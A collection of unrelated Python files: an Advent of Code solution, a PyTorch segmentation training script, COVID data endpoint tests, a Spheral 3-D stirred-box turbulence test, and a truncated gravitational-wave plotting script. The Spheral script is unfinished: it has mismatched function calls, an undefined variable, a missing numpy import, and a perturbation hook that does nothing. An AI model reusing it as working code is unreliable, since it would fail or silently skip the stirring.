def calculate_gamma_epsilon_alternative(self):
gamma = ''
epsilon = ''
data = list(zip(*self.puzzle_input))
for i in range(len(data)):
g = self.group(data[i])
gamma += max(g, key=g.get)
epsilon += min(g, key=g.get)
return int(gamma,2) * int(epsilon,2)
def group(self, values):
d = {}
for x in values:
if d.get(x):
d[x] += 1
else:
d[x] = 1
return d
def calculate_lifesupport_rating(self):
o2_rating = self.calculate_rating('1', max)
co2_rating = self.calculate_rating('0', min)
return o2_rating*co2_rating
def calculate_rating(self, foo, maxminfunc):
collection = self.puzzle_input
for i in range(len(self.puzzle_input)):
values = [x[i] for x in collection]
g = self.group(values)
flag = foo if g.get('0') == g.get('1') else maxminfunc(g, key=g.get)
collection = [x for x in collection if x[i] == flag]
if len(collection) == 1:
return int(collection[0],2)
return int(collection[0],2)
|
import datetime
import os
import torch
from torch import nn
from torch import optim
from torch.autograd import Variable
from torch.backends import cudnn
from torch.utils.data import DataLoader
from torchvision import transforms
from tensorboardX import SummaryWriter
from tqdm import tqdm
import joint_transforms
from config import msd_training_root, msd_testing_root
from config import backbone_path
from dataset import ImageFolder
from misc import AvgMeter, check_mkdir
from model.edge_cbam_x_ccl_wl import EDGE_CBAM_X_CCL
cudnn.benchmark = True
device_ids = [6, 7]
# device_ids = [2, 3, 4, 5]
# device_ids = [1, 0]
ckpt_path = './ckpt'
exp_name = 'EDGE_CBAM_X_CCL_WL'
# batch size of 8 with resolution of 416*416 is exactly OK for the GTX 1080Ti GPU
args = {
'epoch_num': 60,
'train_batch_size': 8,
'val_batch_size': 8,
'last_epoch': 0,
'lr': 1e-4,
'lr_decay': 0.9,
'weight_decay': 5e-4,
'momentum': 0.9,
'snapshot': '',
'scale': 512,
'save_point': [40, 50],
'add_graph': True,
'poly_train': True
}
# Path.
check_mkdir(ckpt_path)
check_mkdir(os.path.join(ckpt_path, exp_name))
vis_path = os.path.join(ckpt_path, exp_name, 'log')
check_mkdir(vis_path)
log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt')
writer = SummaryWriter(log_dir=vis_path, comment=exp_name)
# Transform Data.
joint_transform = joint_transforms.Compose([
joint_transforms.RandomRotate(),
joint_transforms.Resize((args['scale'], args['scale']))
])
val_joint_transform = joint_transforms.Compose([
joint_transforms.Resize((args['scale'], args['scale']))
])
img_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # maybe can optimized.
])
target_transform = transforms.ToTensor()
# Prepare Data Set.
train_set = ImageFolder(msd_training_root, joint_transform, img_transform, target_transform)
print("Train set: {}".format(train_set.__len__()))
train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True)
val_set = ImageFolder(msd_testing_root, val_joint_transform, img_transform, target_transform)
print("Validation Set: {}".format(val_set.__len__()))
val_loader = DataLoader(val_set, batch_size=args['val_batch_size'], num_workers=8, shuffle=False)
# Loss Functions.
bce = nn.BCELoss().cuda(device_ids[0])
bce_logit = nn.BCEWithLogitsLoss().cuda(device_ids[0])
class WL(nn.Module):
def __init__(self):
super(WL, self).__init__()
def forward(self, pred, truth):
# n c h w
N_p = torch.tensor(torch.sum(torch.sum(truth, -1), -1), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
N = torch.tensor(torch.numel(truth[0, :, :, :]), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(N_p)
N_n = N - N_p
pred_p = torch.where(pred.cpu() >= 0.5, torch.tensor(1.), torch.tensor(2.))
TP_mask = torch.where(pred_p == truth.cpu(), torch.tensor(1.), torch.tensor(0.))
TP = torch.tensor(torch.sum(torch.sum(TP_mask, -1), -1), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
pred_n = torch.where(pred.cpu() < 0.5, torch.tensor(1.), torch.tensor(2.))
TN_mask = torch.where(pred_n == (1 - truth.cpu()), torch.tensor(1.), torch.tensor(0.))
TN = torch.tensor(torch.sum(torch.sum(TN_mask, -1), -1), dtype=torch.float).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
L1 = -(N_n / N) * (truth.cpu() * torch.log(pred.cpu())) - (N_p / N) * ((1 - truth.cpu()) * torch.log(1 - pred.cpu()))
L2 = -(1 - TP / N_p) * truth.cpu() * torch.log(pred.cpu()) - (1 - TN / N_n) * (1 - truth.cpu()) * torch.log(1 - pred.cpu())
return L1.mean() + L2.mean()
# # Loss Functions.
# class WL(nn.Module):
# def __init__(self):
# super(WL, self).__init__()
# self.threshold = 10.
#
# def forward(self, pred_logit, truth):
# pred = torch.sigmoid(pred_logit)
# batch_size =truth.size(0)
#
# truth_flat = truth.contiguous().view(batch_size, -1)
#
# N_p = truth_flat.sum(1)
# N_p = torch.where(N_p < self.threshold, torch.tensor(self.threshold).cuda(device_ids[0]), N_p)
# N_n = (1 - truth_flat).sum(1)
#
# w1 = N_n / N_p
# w1 = w1.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
#
# L1 = nn.BCELoss(w1)(pred, truth)
#
# pred_flat = pred.contiguous().view(batch_size, -1)
# pred_flat_bool = torch.where(pred_flat >= 0.5, torch.tensor(1.).cuda(device_ids[0]), torch.tensor(0.).cuda(device_ids[0]))
# TP = (pred_flat_bool * truth_flat).sum(1)
# TN = ((1 - pred_flat_bool) * (1 - truth_flat)).sum(1)
#
# w2 = (1 - (TP / N_p)) / (1 - (TN / N_n))
# w2 = w2.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1).expand_as(truth)
#
# L2 = nn.BCELoss(w2)(pred, truth)
#
# return L1.mean()
class EL(nn.Module):
def __init__(self):
super(EL, self).__init__()
def forward(self, pred, truth):
L = -10 * truth.cpu() * torch.log(pred.cpu()) - (1 - truth.cpu()) * torch.log(1 - pred.cpu())
return L.mean()
wl = WL().cuda(device_ids[0])
el = EL().cuda(device_ids[0])
def main():
print(args)
net = EDGE_CBAM_X_CCL().cuda(device_ids[0]).train()
if args['add_graph']:
writer.add_graph(net, input_to_model=torch.rand(
args['train_batch_size'], 3, args['scale'], args['scale']).cuda(device_ids[0]))
net = nn.DataParallel(net, device_ids=device_ids)
optimizer = optim.SGD([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': 1 * args['lr'], 'weight_decay': args['weight_decay']}
], momentum=args['momentum'])
if len(args['snapshot']) > 0:
print('training resumes from \'%s\'' % args['snapshot'])
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
optimizer.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '_optim.pth')))
optimizer.param_groups[0]['lr'] = 2 * args['lr']
optimizer.param_groups[1]['lr'] = args['lr']
open(log_path, 'w').write(str(args) + '\n\n')
train(net, optimizer)
writer.close()
def train(net, optimizer):
curr_iter = 1
for epoch in range(args['last_epoch'] + 1, args['last_epoch'] + 1 + args['epoch_num']):
loss_f4_record, loss_f3_record, loss_f2_record, loss_f1_record, \
loss_b4_record, loss_b3_record, loss_b2_record, loss_b1_record, \
loss_e_record, loss_fb_record, loss_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), \
AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), \
AvgMeter(), AvgMeter(), AvgMeter()
train_iterator = tqdm(train_loader, total=len(train_loader))
for data in train_iterator:
if args['poly_train']:
base_lr = args['lr'] * (1 - float(curr_iter) / (args['epoch_num'] * len(train_loader))) ** args['lr_decay']
optimizer.param_groups[0]['lr'] = 2 * base_lr
optimizer.param_groups[1]['lr'] = 1 * base_lr
inputs, labels, edges = data
batch_size = inputs.size(0)
inputs = Variable(inputs).cuda(device_ids[0])
labels = Variable(labels).cuda(device_ids[0])
edges = Variable(edges).cuda(device_ids[0])
optimizer.zero_grad()
predict_f4, predict_f3, predict_f2, predict_f1, \
predict_b4, predict_b3, predict_b2, predict_b1, predict_e, predict_fb = net(inputs)
loss_f4 = wl(predict_f4, labels)
loss_f3 = wl(predict_f3, labels)
loss_f2 = wl(predict_f2, labels)
loss_f1 = wl(predict_f1, labels)
# loss_b4 = wl(1 - torch.sigmoid(predict_b4), labels)
# loss_b3 = wl(1 - torch.sigmoid(predict_b3), labels)
# loss_b2 = wl(1 - torch.sigmoid(predict_b2), labels)
# loss_b1 = wl(1 - torch.sigmoid(predict_b1), labels)
loss_b4 = wl(1 - predict_b4, labels)
loss_b3 = wl(1 - predict_b3, labels)
loss_b2 = wl(1 - predict_b2, labels)
loss_b1 = wl(1 - predict_b1, labels)
loss_e = el(predict_e, edges)
loss_fb = wl(predict_fb, labels)
loss = loss_f4 + loss_f3 + loss_f2 + loss_f1 + \
loss_b4 + loss_b3 + loss_b2 + loss_b1 + loss_e + 8 * loss_fb
loss.backward()
optimizer.step()
loss_record.update(loss.data, batch_size)
loss_f4_record.update(loss_f4.data, batch_size)
loss_f3_record.update(loss_f3.data, batch_size)
loss_f2_record.update(loss_f2.data, batch_size)
loss_f1_record.update(loss_f1.data, batch_size)
loss_b4_record.update(loss_b4.data, batch_size)
loss_b3_record.update(loss_b3.data, batch_size)
loss_b2_record.update(loss_b2.data, batch_size)
loss_b1_record.update(loss_b1.data, batch_size)
loss_e_record.update(loss_e.data, batch_size)
loss_fb_record.update(loss_fb.data, batch_size)
if curr_iter % 50 == 0:
writer.add_scalar('Total loss', loss, curr_iter)
writer.add_scalar('f4 loss', loss_f4, curr_iter)
writer.add_scalar('f3 loss', loss_f3, curr_iter)
writer.add_scalar('f2 loss', loss_f2, curr_iter)
writer.add_scalar('f1 loss', loss_f1, curr_iter)
writer.add_scalar('b4 loss', loss_b4, curr_iter)
writer.add_scalar('b3 loss', loss_b3, curr_iter)
writer.add_scalar('b2 loss', loss_b2, curr_iter)
writer.add_scalar('b1 loss', loss_b1, curr_iter)
writer.add_scalar('e loss', loss_e, curr_iter)
writer.add_scalar('fb loss', loss_fb, curr_iter)
log = '[%3d], [f4 %.5f], [f3 %.5f], [f2 %.5f], [f1 %.5f] ' \
'[b4 %.5f], [b3 %.5f], [b2 %.5f], [b1 %.5f], [e %.5f], [fb %.5f], [lr %.6f]' % \
(epoch,
loss_f4_record.avg, loss_f3_record.avg, loss_f2_record.avg, loss_f1_record.avg,
loss_b4_record.avg, loss_b3_record.avg, loss_b2_record.avg, loss_b1_record.avg,
loss_e_record.avg, loss_fb_record.avg, base_lr)
train_iterator.set_description(log)
open(log_path, 'a').write(log + '\n')
curr_iter += 1
if epoch in args['save_point']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
net.cuda(device_ids[0])
if epoch >= args['epoch_num']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
print("Optimization Have Done!")
return
if __name__ == '__main__':
main()
|
import json
import aiohttp
from rki_covid_parser.const import DISTRICTS_URL, DISTRICTS_URL_RECOVERED, DISTRICTS_URL_NEW_CASES, DISTRICTS_URL_NEW_RECOVERED, DISTRICTS_URL_NEW_DEATHS
async def test_endpoint_districts():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL)
async def test_endpoint_districts_recovered():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_RECOVERED)
async def test_endpoint_districts_new_cases():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_NEW_CASES)
async def test_endpoint_districts_new_recovered():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_NEW_RECOVERED)
async def test_endpoint_districts_new_deaths():
"""Test the real service endpoint for availibility."""
await _test_endpoint(DISTRICTS_URL_NEW_DEATHS)
async def _test_endpoint(url: str):
"""Test if given endpoint is returning data."""
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
assert response.status == 200
body = await response.text()
data = json.loads(body)
assert data is not None
assert type(data) == dict
assert "features" in data
assert len(data["features"]) > 0
for feature in data["features"]:
assert "attributes" in feature
|
#-------------------------------------------------------------------------------
# 3-D stirred box test
#
#
#-------------------------------------------------------------------------------
from math import *
from Spheral3d import *
from SpheralTestUtilities import *
from SpheralGnuPlotUtilities import *
from findLastRestart import *
from SpheralVisitDump import dumpPhysicsState
import mpi
from GenerateNodeDistribution3d import *
title("3-D stirred box turbulence test")
#-------------------------------------------------------------------------------
# Generic problem parameters
#-------------------------------------------------------------------------------
commandLine(seed = "lattice",
nsize = 100,
f_solenoidal = 0.66,
kmin = 1,
kmax = 50, #must be <= nsize/2
perturbEach = 1,
rho1 = 1.0,
eps1 = 0.0,
nPerh = 2.01,
gamma = 5.0/3.0,
mu = 1.0,
SVPH = False,
CRKSPH = False,
ASPH = False,
SPH = True, # This just chooses the H algorithm -- you can use this with CRKSPH for instance.
filter = 0.0, # CRKSPH filtering
Qconstructor = MonaghanGingoldViscosity,
#Qconstructor = TensorMonaghanGingoldViscosity,
linearConsistent = False,
fcentroidal = 0.0,
fcellPressure = 0.0,
boolReduceViscosity = False,
nh = 5.0,
aMin = 0.1,
aMax = 2.0,
Qhmult = 1.0,
Cl = 1.0,
Cq = 1.0,
linearInExpansion = False,
Qlimiter = False,
balsaraCorrection = False,
epsilon2 = 1e-2,
hmin = 0.0001,
hmax = 0.5,
hminratio = 0.1,
cfl = 0.5,
useVelocityMagnitudeForDt = False,
XSPH = False,
epsilonTensile = 0.0,
nTensile = 8,
IntegratorConstructor = CheapSynchronousRK2Integrator,
goalTime = 2.0,
steps = None,
vizCycle = None,
vizTime = 0.1,
dt = 0.0001,
dtMin = 1.0e-8,
dtMax = 0.1,
dtGrowth = 2.0,
maxSteps = None,
statsStep = 10,
smoothIters = 0,
HUpdate = IdealH,
domainIndependent = False,
rigorousBoundaries = False,
dtverbose = False,
densityUpdate = RigorousSumDensity, # VolumeScaledDensity,
compatibleEnergy = True, # <--- Important! rigorousBoundaries does not work with the compatibleEnergy algorithm currently.
gradhCorrection = False,
useVoronoiOutput = False,
clearDirectories = False,
restoreCycle = None,
restartStep = 100,
redistributeStep = 500,
checkRestart = False,
dataDir = "stir-3d",
outputFile = "None",
comparisonFile = "None",
serialDump = False, #whether to dump a serial ascii file at the end for viz
)
# Decide on our hydro algorithm.
if SVPH:
if ASPH:
HydroConstructor = ASVPHFacetedHydro
else:
HydroConstructor = SVPHFacetedHydro
elif CRKSPH:
Qconstructor = LimitedMonaghanGingoldViscosity
if ASPH:
HydroConstructor = ACRKSPHHydro
else:
HydroConstructor = CRKSPHHydro
else:
if ASPH:
HydroConstructor = ASPHHydro
else:
HydroConstructor = SPHHydro
xmin = (0.0, 0.0, 0.0)
xmax = (1.0, 1.0, 1.0)
nx = nsize
ny = nsize
nz = nsize
n = [nx,ny,nz]
dataDir = os.path.join(dataDir,
"rho1=%g" % rho1,
str(HydroConstructor).split("'")[1].split(".")[-1],
"densityUpdate=%s" % (densityUpdate),
"compatibleEnergy=%s" % (compatibleEnergy),
"XSPH=%s" % XSPH,
"filter=%s" % filter,
"%s-Cl=%g-Cq=%g" % (str(Qconstructor).split("'")[1].split(".")[-1], Cl, Cq),
"%ix%ix%i" % (nx, ny, nz),
"nPerh=%g-Qhmult=%g" % (nPerh, Qhmult))
restartDir = os.path.join(dataDir, "restarts")
vizDir = os.path.join(dataDir, "visit")
restartBaseName = os.path.join(restartDir, "stir-3d")
vizBaseName = "stir-3d"
#-------------------------------------------------------------------------------
# Helper functions for the generation of perturbations
#-------------------------------------------------------------------------------
def init_perturbations(dtype):
kx = np.zeros(n, dtype=dtype)
ky = np.zeros(n, dtype=dtype)
kz = np.zeros(n, dtype=dtype)
# perform fft k-ordering convention shifts
for j in range(0,n[1]):
for k in range(0,n[2]):
kx[:,j,k] = n[0]*np.fft.fftfreq(n[0])
for i in range(0,n[0]):
for k in range(0,n[2]):
ky[i,:,k] = n[1]*np.fft.fftfreq(n[1])
for i in range(0,n[0]):
for j in range(0,n[1]):
kz[i,j,:] = n[2]*np.fft.fftfreq(n[2])
kx = np.array(kx, dtype=dtype)
ky = np.array(ky, dtype=dtype)
kz = np.array(kz, dtype=dtype)
k = np.sqrt(np.array(kx**2+ky**2+kz**2, dtype=dtype))
# only use the positive frequencies
inds = np.where(np.logical_and(k**2 >= kmin**2, k**2 < (kmax+1)**2))
nr = len(inds[0])
phasex = np.zeros(n, dtype=dtype)
phasex[inds] = 2.*pi*np.random.uniform(size=nr)
fx = np.zeros(n, dtype=dtype)
fx[inds] = np.random.normal(size=nr)
phasey = np.zeros(n, dtype=dtype)
phasey[inds] = 2.*pi*np.random.uniform(size=nr)
fy = np.zeros(n, dtype=dtype)
fy[inds] = np.random.normal(size=nr)
phasez = np.zeros(n, dtype=dtype)
phasez[inds] = 2.*pi*np.random.uniform(size=nr)
fz = np.zeros(n, dtype=dtype)
fz[inds] = np.random.normal(size=nr)
# rescale perturbation amplitude so that low number statistics
# at low k do not throw off the desired power law scaling.
for i in range(kmin, kmax+1):
slice_inds = np.where(np.logical_and(k >= i, k < i+1))
rescale = sqrt(np.sum(np.abs(fx[slice_inds])**2 + np.abs(fy[slice_inds])**2 + np.abs(fz[slice_inds])**2))
fx[slice_inds] = fx[slice_inds]/rescale
fy[slice_inds] = fy[slice_inds]/rescale
fz[slice_inds] = fz[slice_inds]/rescale
# set the power law behavior
# wave number bins
fx[inds] = fx[inds]*k[inds]**-(0.5*alpha)
fy[inds] = fy[inds]*k[inds]**-(0.5*alpha)
fz[inds] = fz[inds]*k[inds]**-(0.5*alpha)
# add in phases
fx = np.cos(phasex)*fx + 1j*np.sin(phasex)*fx
fy = np.cos(phasey)*fy + 1j*np.sin(phasey)*fy
fz = np.cos(phasez)*fz + 1j*np.sin(phasez)*fz
return fx, fy, fz, kx, ky, kz
def normalize(fx, fy, fz):
norm = np.sqrt(np.sum(fx**2 + fy**2 + fz**2)/np.product(n))
fx = fx/norm
fy = fy/norm
fz = fz/norm
return fx, fy, fz
def make_perturbations():
fx, fy, fz, kx, ky, kz = init_perturbations(n, kmin, kmax, dtype)
if f_solenoidal != None:
k2 = kx**2+ky**2+kz**2
# solenoidal part
fxs = 0.; fys =0.; fzs = 0.
if f_solenoidal != 0.0:
fxs = np.real(fx - kx*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fys = np.real(fy - ky*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fzs = np.real(fz - kz*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
ind = np.where(k2 == 0)
fxs[ind] = 0.; fys[ind] = 0.; fzs[ind] = 0.
# need to normalize this before applying relative weighting of solenoidal / compressive components
norm = np.sqrt(np.sum(fxs**2+fys**2+fzs**2))
fxs = fxs/norm
fys = fys/norm
fzs = fzs/norm
# compressive part
# get a different random cube for the compressive part
# so that we can target the RMS solenoidal fraction,
# instead of setting a constant solenoidal fraction everywhere.
fx, fy, fz, kx, ky, kz = init_perturbations(dtype)
fxc = 0.; fyc =0.; fzc = 0.
if f_solenoidal != 1.0:
fxc = np.real(kx*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fyc = np.real(ky*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
fzc = np.real(kz*(kx*fx+ky*fy+kz*fz)/np.maximum(k2,1e-16))
ind = np.where(k2 == 0)
fxc[ind] = 0.; fyc[ind] = 0.; fzc[ind] = 0.
# need to normalize this before applying relative weighting of solenoidal / compressive components
norm = np.sqrt(np.sum(fxc**2+fyc**2+fzc**2))
fxc = fxc/norm
fyc = fyc/norm
fzc = fzc/norm
# back to real space
pertx = np.real(np.fft.ifftn(f_solenoidal*fxs + (1.-f_solenoidal)*fxc))
perty = np.real(np.fft.ifftn(f_solenoidal*fys + (1.-f_solenoidal)*fyc))
pertz = np.real(np.fft.ifftn(f_solenoidal*fzs + (1.-f_solenoidal)*fzc))
else:
# just convert to real space
pertx = np.real(np.fft.ifftn(fx))
perty = np.real(np.fft.ifftn(fy))
pertz = np.real(np.fft.ifftn(fz))
# subtract off COM (assuming uniform density)
pertx = pertx-np.average(pertx)
perty = perty-np.average(perty)
pertz = pertz-np.average(pertz)
# scale RMS of perturbation cube to unity
pertx, perty, pertz = normalize(pertx, perty, pertz)
return pertx, perty, pertz
#-------------------------------------------------------------------------------
# Periodic work function
#-------------------------------------------------------------------------------
class perturb(object):
def __init__(self,nodeSet,directory):
self.nodeSet = nodeSet
self.directory = directory
def __call__(self, cycle, time, dt):
pertx, perty, pertz = make_perturbations()
#-------------------------------------------------------------------------------
# Check if the necessary output directories exist. If not, create them.
#-------------------------------------------------------------------------------
import os, sys
if mpi.rank == 0:
if clearDirectories and os.path.exists(dataDir):
shutil.rmtree(dataDir)
if not os.path.exists(restartDir):
os.makedirs(restartDir)
if not os.path.exists(vizDir):
os.makedirs(vizDir)
mpi.barrier()
#-------------------------------------------------------------------------------
# If we're restarting, find the set of most recent restart files.
#-------------------------------------------------------------------------------
if restoreCycle is None:
restoreCycle = findLastRestart(restartBaseName)
#-------------------------------------------------------------------------------
# Material properties.
#-------------------------------------------------------------------------------
eos = GammaLawGasMKS(gamma, mu)
#-------------------------------------------------------------------------------
# Interpolation kernels.
#-------------------------------------------------------------------------------
WT = TableKernel(BSplineKernel(), 1000)
output("WT")
kernelExtent = WT.kernelExtent
#-------------------------------------------------------------------------------
# Make the NodeList.
#-------------------------------------------------------------------------------
nodes1 = makeFluidNodeList("High density gas", eos,
hmin = hmin,
hmax = hmax,
hminratio = hminratio,
nPerh = nPerh,
kernelExtent = kernelExtent)
output("nodes1.nodesPerSmoothingScale")
output("nodes1.hmin")
output("nodes1.hmax")
output("nodes1.hminratio")
#-------------------------------------------------------------------------------
# Set the node properties.
#-------------------------------------------------------------------------------
if restoreCycle is None:
generator1 = GenerateNodeDistribution3d(nx, ny, nz, rho1, seed,
xmin = xmin,
xmax = xmax,
nNodePerh = nPerh)
if mpi.procs > 1:
from VoronoiDistributeNodes import distributeNodes3d
else:
from DistributeNodes import distributeNodes3d
distributeNodes3d((nodes1, generator1))
output("mpi.reduce(nodes1.numInternalNodes, mpi.MIN)")
output("mpi.reduce(nodes1.numInternalNodes, mpi.MAX)")
output("mpi.reduce(nodes1.numInternalNodes, mpi.SUM)")
# Set node specific thermal energies
nodes1.specificThermalEnergy(ScalarField("tmp", nodes1, eps1))
#-------------------------------------------------------------------------------
# Construct a DataBase to hold our node list
#-------------------------------------------------------------------------------
db = DataBase3d()
output("db")
db.appendNodeList(nodes1)
output("db.numNodeLists")
output("db.numFluidNodeLists")
#-------------------------------------------------------------------------------
# Construct the artificial viscosity.
#-------------------------------------------------------------------------------
q = Qconstructor(Cl, Cq, linearInExpansion)
q.epsilon2 = epsilon2
q.limiter = Qlimiter
q.balsaraShearCorrection = balsaraCorrection
output("q")
output("q.Cl")
output("q.Cq")
output("q.epsilon2")
output("q.limiter")
output("q.balsaraShearCorrection")
output("q.linearInExpansion")
output("q.quadraticInExpansion")
#-------------------------------------------------------------------------------
# Construct the hydro physics object.
#-------------------------------------------------------------------------------
if SVPH:
hydro = HydroConstructor(W = WT,
Q = q,
cfl = cfl,
useVelocityMagnitudeForDt = useVelocityMagnitudeForDt,
compatibleEnergyEvolution = compatibleEnergy,
densityUpdate = densityUpdate,
XSVPH = XSPH,
linearConsistent = linearConsistent,
generateVoid = False,
HUpdate = HUpdate,
fcentroidal = fcentroidal,
fcellPressure = fcellPressure,
xmin = Vector(-2.0, -2.0, -2.0),
xmax = Vector(3.0, 3.0, 3.0))
# xmin = Vector(x0 - 0.5*(x2 - x0), y0 - 0.5*(y2 - y0)),
# xmax = Vector(x2 + 0.5*(x2 - x0), y2 + 0.5*(y2 - y0)))
elif CRKSPH:
hydro = HydroConstructor(W = WT,
Q = q,
filter = filter,
cfl = cfl,
useVelocityMagnitudeForDt = useVelocityMagnitudeForDt,
compatibleEnergyEvolution = compatibleEnergy,
XSPH = XSPH,
densityUpdate = densityUpdate,
HUpdate = HUpdate)
else:
hydro = HydroConstructor(W = WT,
Q = q,
cfl = cfl,
useVelocityMagnitudeForDt = useVelocityMagnitudeForDt,
compatibleEnergyEvolution = compatibleEnergy,
gradhCorrection = gradhCorrection,
XSPH = XSPH,
densityUpdate = densityUpdate,
HUpdate = HUpdate,
epsTensile = epsilonTensile,
nTensile = nTensile)
output("hydro")
output("hydro.kernel()")
output("hydro.PiKernel()")
output("hydro.cfl")
output("hydro.compatibleEnergyEvolution")
output("hydro.densityUpdate")
output("hydro.HEvolution")
packages = [hydro]
#-------------------------------------------------------------------------------
# Create boundary conditions.
#-------------------------------------------------------------------------------
xPlane0 = Plane(Vector(*xmin), Vector(1.0, 0.0, 0.0))
xPlane1 = Plane(Vector(*xmax), Vector(-1.0,0.0, 0.0))
yPlane0 = Plane(Vector(*xmin), Vector(0.0, 1.0, 0.0))
yPlane1 = Plane(Vector(*xmax), Vector(0.0, -1.0, 0.0))
zPlane0 = Plane(Vector(*xmin), Vector(0.0, 0.0, 1.0))
zPlane1 = Plane(Vector(*xmax), Vector(0.0, 0.0, -1.0))
xbc = PeriodicBoundary(xPlane0, xPlane1)
ybc = PeriodicBoundary(yPlane0, yPlane1)
zbc = PeriodicBoundary(zPlane0, zPlane1)
for p in packages:
p.appendBoundary(xbc)
p.appendBoundary(ybc)
p.appendBoundary(zbc)
#-------------------------------------------------------------------------------
# Construct a time integrator, and add the physics packages.
#-------------------------------------------------------------------------------
integrator = IntegratorConstructor(db)
for p in packages:
integrator.appendPhysicsPackage(p)
integrator.lastDt = dt
integrator.dtMin = dtMin
integrator.dtMax = dtMax
integrator.dtGrowth = dtGrowth
integrator.domainDecompositionIndependent = domainIndependent
integrator.verbose = dtverbose
integrator.rigorousBoundaries = rigorousBoundaries
output("integrator")
output("integrator.havePhysicsPackage(hydro)")
output("integrator.lastDt")
output("integrator.dtMin")
output("integrator.dtMax")
output("integrator.dtGrowth")
output("integrator.domainDecompositionIndependent")
output("integrator.rigorousBoundaries")
output("integrator.verbose")
#-------------------------------------------------------------------------------
# Make the problem controller.
#-------------------------------------------------------------------------------
if useVoronoiOutput:
import SpheralVoronoiSiloDump
vizMethod = SpheralVoronoiSiloDump.dumpPhysicsState
else:
import SpheralPointmeshSiloDump
vizMethod = SpheralPointmeshSiloDump.dumpPhysicsState
control = SpheralController(integrator, WT,
initializeDerivatives = True,
statsStep = statsStep,
restartStep = restartStep,
restartBaseName = restartBaseName,
restoreCycle = restoreCycle,
redistributeStep = redistributeStep,
vizMethod = vizMethod,
vizBaseName = vizBaseName,
vizDir = vizDir,
vizStep = vizCycle,
vizTime = vizTime,
SPH = SPH)
pert = perturb([nodes1],dataDir)
control.appendPeriodicWork(pert,perturbEach)
output("control")
#-------------------------------------------------------------------------------
# Advance to the end time.
#-------------------------------------------------------------------------------
control.advance(goalTime)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 10 17:31:56 2020
@author: Paolo Campeti
This script reproduces Figure 8 in the paper.
Uses methods imported from module sgwbprobecomb/SGWB_Signal.py and
sgwbprobecomb/Binned_errors.py.
"""
import os.path as op
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import seaborn as sns
# import our classes and methods
from sgwbprobe.SGWB_Signal import Signal_GW
from sgwbprobe.Binned_errors import Binned_GW
#seaborn settings
sns.set()
sns.set(style='whitegrid')
#matplotlib settings
mpl.rcParams['figure.dpi'] = 300
mpl.rcParams['figure.figsize'] = [5,3]
mpl.rcParams['text.usetex'] = True
mpl.rc('font',**{'family':'serif','serif':['Times New Roman'],'size':14})
axissize = 6
labelsize = 8
legendsize = 10
colornorm = colors.Normalize(vmin=0.0, vmax=5.0)
linesize = 2
# Useful constant: seconds in a year
year_sec = 60*60*24*365
# Load and unpack PTA and Interferometers instrumental strains
# SKA
SKA_file = np.load(op.join(op.dirname(__file__), 'files/hc_SKA.npz'))
SKA_freq = SKA_file['x']
SKA_hc = SKA_file['y']
SKA_strain = SKA_hc**2/SKA_freq
eff_SKA = 1. # mission efficiency factor
SKA_T_obs = 10 * year_sec * eff_SKA
# Einstein Telescope
ET = np.load(op.join(op.dirname(__file__),'files/S_h_ET.npz'))
ET_freq = ET['x']
ET_strain = ET['y']
eff_ET = 1. # mission efficiency factor
ET_T_obs = 1 * year_sec * eff_ET
# Advanced LIGO
aLIGO = np.load(op.join(op.dirname(__file__),'files/S_h_aLIGO.npz'))
aLIGO_freq = aLIGO['x']
aLIGO_strain = aLIGO['y']
eff_aLIGO = 1. # mission efficiency factor
aLIGO_T_obs = 4 * year_sec * eff_aLIGO
# LISA
LISA_xcosmo = np.load(op.join(op.dirname(__file__),'files/S_h_LISA_xcosmo.npz'))
LISA_xcosmo_freq = LISA_xcosmo['x']
LISA_xcosmo_strain = LISA_xcosmo['y']
eff_LISA = 0.75
LISA_xcosmo_T_obs = 4 * year_sec * eff_LISA
# muAres without fgs
Ares_nofgs = np.load(op.join(op.dirname(__file__),'files/S_h_muAres_nofgs.npz'))
Ares_nofgs_freq = Ares_nofgs['x']
Ares_nofgs_strain = Ares_nofgs['y']
eff_Ares = 1.
Ares_nofgs_T_obs = 10 * year_sec * eff_Ares
# BBO STAR
BBO_STAR = np.load(op.join(op.dirname(__file__),'files/S_h_BBO_STAR.npz'))
BBO_STAR_freq = BBO_STAR['x']
BBO_STAR_strain = BBO_STAR['y']
eff_BBO = 1.
BBO_STAR_T_obs = 10 * year_sec * eff_BBO
# DECIGO
DECIGO = np.load(op.join(op.dirname(__file__),'files/S_h_DECIGO.npz'))
DECIGO_freq = DECIGO['x']
DECIGO_strain = DECIGO['y']
